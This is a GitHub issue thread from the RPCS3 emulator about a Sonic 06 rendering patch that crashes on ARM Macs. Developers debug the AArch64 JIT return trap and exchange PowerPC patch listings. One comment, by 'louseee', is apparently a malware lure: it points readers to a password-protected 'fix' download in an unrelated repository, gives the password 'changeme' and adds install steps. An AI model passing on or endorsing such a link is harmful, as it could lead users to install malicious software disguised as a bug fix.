### ISSUE TITLE
[Bug] [ARM] Sonic 06 render fix patch crashes game on main menu

### ISSUE THREAD

**Issue by squidbus** [RPCS3/rpcs3#16014]
### Quick summary

Using an ARM Mac build, the Sonic 06 [canary patch to fix rendering](https://wiki.rpcs3.net/index.php?title=Sonic_The_Hedgehog#Special_Notes) crashes the game after loading a save when you reach the main menu.

### Details

The emulator completely crashes to desktop when this occurs. It does not occur using x86_64 builds under Rosetta 2, and disabling the patch does not crash but the game has missing graphics that make it unplayable.

Some further investigating seems to suggest this is specifically related to using `calloc` as I'm unable to get even a simple nop sequence to not crash.

Contents of the patch:
```
    - [ calloc, 0x00f07714, 0x04 ]
    - [ be32, 0x00000000, 0x38800003 ] # li r4, 3
    - [ jumpf, 0x00000000, "RPCS3_HLE_LIBRARY:WaitForSPUsToEmptySNRs" ] # Args: (SPU ID, 3)
    - [ be32, 0x00000000, 0x38800000 ] # li r4, 0
    - [ be32, 0x00000000, 0x44000002 ] # sc
```

### Attach a log file

Log: [RPCS3.log.gz](https://github.com/user-attachments/files/16790637/RPCS3.log.gz)
macOS Crash Report: [macos-crash-report.txt.gz](https://github.com/user-attachments/files/16790638/macos-crash-report.txt.gz)

### System configuration

Apple M3 Max, macOS 15.1

**Comment by louseee** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Megamouse** [comment]
@kd-11 we don't allow issues with patches applied, but since this is an arch/OS issue, I'll leave it to you to close this or not.

**Comment by squidbus** [comment]
How else would this be reported/fixed if its an issue with the patch system itself?

**Comment by squidbus** [comment]
Opened it up in a debugger and it seems to be hitting this breakpoint instruction and crashing: https://github.com/RPCS3/rpcs3/blob/master/rpcs3/Emu/CPU/Backends/AArch64/AArch64JIT.cpp#L424

**Comment by kd-11** [comment]
Yea, the patch needs minor alteration to work with arm. We could modify the JIT but those safeguards are there to catch cases where regular games misbehave. Tail calls simply should never return on non-x86 architectures.

**Comment by kd-11** [comment]
I wonder if patching codecaves have function names with a distinguishable pattern? In that case an exception could be added to such calls. It is highly unlikely though.
I'll try to update the patch itself.

**Comment by kd-11** [comment]
An easy way to fix this is to just tell the translator about injected code caves. I'll try and set that up.

**Comment by kd-11** [comment]
https://github.com/RPCS3/rpcs3/pull/16019 solves this in a hacky way, but I think it's a bad idea. It makes more sense to replace the branch with a call and return from the codecave normally. That way it will be portable across architectures.

**Comment by squidbus** [comment]
For what it's worth I tried rewriting the patch to eliminate the `calloc` and hit the same issue using `jumpf`.

**Comment by kd-11** [comment]
Yea I'll check again. The callee shouldn't have returned normally; not sure why that happened. Unless maybe we're going through a C++ section at some point. I'll have to investigate that later.

**Comment by squidbus** [comment]
Here's the `calloc`-less patch I wrote for reference in case it helps:
```
    - [ be32, 0x00f076fc, 0x80630410 ] # lwz r3, 0x410(r3)
    - [ be32, 0x00f07700, 0x7c852378 ] # or r5, r4, r4
    - [ be32, 0x00f07704, 0x396000b8 ] # li r11, 0xb8
    - [ be32, 0x00f07708, 0x38800003 ] # li r4, 3
    - [ jumpf, 0x00f0770c, "RPCS3_HLE_LIBRARY:WaitForSPUsToEmptySNRs" ] # Args: (SPU ID, 3)
    - [ be32, 0x00f07710, 0x38800000 ] # li r4, 0
    - [ be32, 0x00f07714, 0x44000002 ] # sc
    - [ be32, 0x00f07718, 0x4e800020 ] # blr
```

**Comment by kd-11** [comment]
Oh, I'm blind. That's why it is crashing. The HLE library part calls a C++ block which then returns normally unwinding the chain back to the return trap.
Unfortunately the way the jump/branch is built using a patchpoint makes it impossible to know if it is a returner or not. I'll play around with this a little more and see if I can identify that.
